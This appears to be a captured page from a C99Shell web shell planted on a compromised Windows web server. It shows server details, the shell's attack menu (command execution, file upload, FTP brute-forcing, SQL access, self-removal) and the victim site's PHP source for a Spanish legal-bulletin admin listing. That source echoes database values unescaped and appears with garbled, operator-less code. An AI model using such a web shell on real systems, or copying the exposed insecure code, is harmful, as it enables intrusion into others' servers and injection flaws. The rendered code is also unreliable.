!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA2\boletinlegal\admin\conceptos\   drwxrwxrwx
Free 7.32 GB of 239.26 GB (3.06%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mostrar 1.php (3.82 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include("../../conex.php");
?>    


<html><head>
<title>Modulo Administraci&oacute;n</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="../index_files/style.css" rel="stylesheet" type="text/css">
<link rel="StyleSheet" href="../../tabla_files/orangebrownie.css" type="text/css">
<script language="JavaScript">

function enviar(){
document.forms.norma.submit();
}

</script>
</head>
<body bgcolor="#FCFAE6">

<div> <img src="../index_files/header.png" width="780" height="228" border="0"></div>


  

  <TABLE width="764" border=0 style="BORDER-LEFT-COLOR: green; BORDER-BOTTOM-COLOR: green; BORDER-TOP-COLOR: green; BORDER-RIGHT-COLOR: green" align="center">
              
                              <TR>
                                 <TD>
                                 
                                 <div id='boundary'>
  
    <div id='content'>
      <div id='itsthetable'>
        <table width='100%'>
            
            <thead>
                <tr>
                    <th width='91' scope='col'>Id</th>
                    <th width='139' scope='col'>Radicado</th>
                    <th width='85' scope='col'>Fecha Radicado</th>
                    <th width='129' scope='col'>Solicitante</th>
                    <th width='186' scope='col'>Cargo</th>
                    <th width='100' scope='col'>Seleccionar</th>
                    
                </tr>
            </thead>
                                 <?php 
    $sql 
"select id,radicado_entrada,fecha_entrada,solicitante,cargo,entidad,no,fecha_concepto,objeto,abogado,radicado_salida,fecha_salida,observaciones,publicacion,vinculo from conceptos order by id asc"

//echo "$sql";    
    //id='$id'";
    
$cursor mysql_query$sql$conexion );
    
$num_rows mysql_num_rows($cursor);
    
$change=0;

while( 
$row mysql_fetch_array$cursor ) ){
    
$id $row["id"];
    
$radicado_entrada $row["radicado_entrada"];
    
$fecha_entrada $row["fecha_entrada"];
    
$solicitante $row["solicitante"];
    
$cargo $row["cargo"];
    
$entidad $row["entidad"];
    
$no $row["no"];
    
$fecha_concepto $row["fecha_concepto"];
    
$objeto $row["objeto"];
    
$abogado $row["abogado"];
    
$radicado_salida $row["radicado_salida"];
    
$fecha_salida $row["fecha_salida"];
    
$observaciones $row["observaciones"];
    
$publicacion $row["publicacion"];
    
$vinculo $row["vinculo"];
    
$con $con+1;              
    
    
?>                               
            
            <form name="<?php echo "form$con"?>" method="post" action="../conceptos/modificar.php">
                     <tbody>             
            
                                
                                <tr  <?php if ($change == 1) {echo "class='odd'";} ?>>
                    <td><input name='id' type='text' onFocus='setFocus(this.id);' onBlur='setFocus(' value='<?php echo "$id"?>' size="4"');'></td>
                    <td><input type='text' name='radicado_entrada' value='<?php echo "$radicado_entrada"?>' onFocus='setFocus(this.id);' onBlur='setFocus('');'></td>
                    <td><?php echo "$fecha_entrada"?></td>
                    <td><?php echo "$solicitante"?></td>
                    <td><?php echo "$cargo"?></td>
                    <td><INPUT id=creTercero:_id468 onBlur="setFocus('');" onfocus=setFocus(this.id); onClick="window.opener.document.getElementById('radicado_entrada').value = window.document.<?php echo "form$con"?>.radicado_entrada.value; 
 window.opener.document.getElementById('id').value = window.document.<?php echo "form$con"?>.id.value;                    window.opener.focus(); self.close(); return false;" type=button value=Aceptar name=creTercero:_id468>
                                </INPUT></td>
                </tr>
           </form>
<?php 
if ($change == 0){
$change=1;
}
else if (
$change == 1){
$change=0;
}

}

?>           
<tfoot>
                <tr>
                    <th scope='row'>Total Registros:</th>
                    <td colspan='4'><?php echo "$num_rows"?></td>
                </tr>
            </tfoot>        
        </table>
    </div>

      

    
</div>
</div>
                                 </TD>
                                 
                                </TR>
                                
                            </TBODY></TABLE>                                              </TD>
              </TR></TBODY>
  </TABLE>
</FORM>    
</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--